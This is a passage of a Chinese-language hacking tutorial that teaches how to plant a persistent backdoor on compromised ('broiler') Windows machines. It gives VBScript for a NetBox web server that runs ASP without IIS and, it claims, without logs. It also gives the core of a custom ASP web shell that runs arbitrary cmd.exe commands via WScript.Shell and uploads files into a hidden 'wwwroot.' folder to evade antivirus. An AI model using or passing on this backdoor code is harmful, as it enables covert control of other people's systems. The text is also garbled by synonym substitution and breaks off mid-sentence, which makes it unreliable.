一、序言 在当今微软当道的年代,找肉鸡已经不是什么难事,各种各样的傻瓜工具大大方便了菜鸟们的入侵,但是每每入侵成功了,怎么去做好后门,把肉鸡尽可能久的捉住每每困惑着像我一样的菜鸟们。用过无数网上经典的后门后,在丢失了许多辛辛劳苦弄到的肉鸡后,我下定决心要写自己的后门。于是有了下面的文章。 二、Netbox简介 一个有时的机会,我认识了Netbox。Netbox是一个利用脚本措辞进行运用软件开拓与发布的开拓环境和运行平台,利用 NetBox,可以完备利用脚本措辞(比如 VBScript,Javascript) 创建出稳定高效的运用软件,并且可以平滑移植到从 Windows 98 到 Windows .NET Server 的全部操作系统上。 它可以方便地将asp运用编译成为独立运行的实行程序,完备摆脱iis的束缚(将iis卸载后程序运行仍旧正常),在险些所有的Windows版本上面直接运行,完备不须要考虑平台兼容性和对asp运行环境的哀求。同时NetBox还供应大量扩展部件,使得WEB运用更加方便。说了那么多,大家肯定很想见识见识这位帅哥吧,好。 三、一起动手 如果大家已经对脚本措辞VBScript或者Javascript有一点理解,那就可以跟我动手了。我们的任务是在建立一个与iis完备无关的web做事器,它可以为我们供应FSO的支持,以方便上传文件。并支持脚本宿主WSH,这样我们就能实行命令了。在网站根目录里我们可以放上自己的asp木马或其它的木马后门并可以随时实行。 首先须要建立我们的web做事器,这个做事器和IIS没有任何关系,纵然卸载了IIS它也可以运行。利用NetBox的HttpServer工具就能轻易地办到。 在记事本里写入如下几行代码: Set httpd = CreateObject(“NetBox.HttpServer”) 创建httpserver工具 If httpd.Create(“”, 8000) = 0 Then web做事端口设为8000,可以自己改,不要和其他端口冲突就行了。 Set host = httpd.AddHost(“”, “\wwwroot”) 设置web做事的根目录为文件夹”wwwroot”。 host.EnableScript = true 使Web做事器能够理解做事器端脚本程序,既支持asp。 host.AddDefault “default.asp” host.AddDefault “default.htm” host.AddDefault “index.asp” host.AddDefault “index.htm” host.AddDefault “default.html” host.AddDefault “index.html” 设置缺省文件,相称于iis中的默认文档。 httpd.Start 开始做事 else httpd.Stop Shell.Quit 0 End If End Sub 将文件存为main.box。 这样一个支持asp的做事器源代码就写成功了,它可以让你的asp木马为所欲为地运行,而且不用担心会有日志记录,但是现在它还远不是一个后门,只是供应了与IIS相称的功能,为了防止后门被杀,我们不妨自己来写一个大略的CMD.ASP,当然不是那个所谓的最简短的asp后门了。我们要实现的功能是可以上传文件和实行命令。 这里只剖析紧张的代码,详细的代码附在了软件包里。 set pyeWSH=server.createobject(“WSCRIPT.SHELL”) 建立shell(wshshell)工具pyeWSH set pyeFSO=server.createobject(“scripting.filesystemobject”) 建立文件系统工具pyeFSO用于文件方面的操作 szTempFile=”C:\”& pyeFSO.GetTempName() GetTempName()是fso建立临时文件的一种方法 Call pyeWSH.Run (“cmd.exe /c “&szCMD &”>”&szTempFile,0,true) 调用wshshell的run方法来实行命令,并把结果重定向到临时文件中 set oFile=pyeFSO.OpenTextFile(szTempFile,1,False,0) 以读的办法打开临时文件思路该当很清楚,我大略说说。建立shell工具是用于实行命令,建立文件系统工具是用于将命令实行的结果输入到一个临时文件中并将文件内容读出来。要看到命令实行的结果只要加上这样一句: response.write server.HTMLEncode(oFile.ReadAll) 就能读出临时文件的内容并显示出来。实现上传文件功能的代码也很大略。 把稳这里是将上传的文件保存到了肉鸡上的一个“wwwroot.”的文件夹下面,这个文件夹只能在CMD下面用mkdir wwwroot..\ 建立。放在这个文件夹里的文件在一样平常情形下是看不到的,以是可以在一定程度上躲过杀毒软件的查杀,不过实行的时候也要麻烦一点了,由于放在这里面的程序用shell工具的run方法运行不了的,由于根本找不到这个要实行的文件。但奇怪的是可以将里面的文件copy到别的地方,以是须要实行时便是先要将文件copy到其它目录下,当然啦这么大略的事我们的后门完备可以做到。Asp后门就这样做好了,很大略吧?而且功能也不差,如果你够
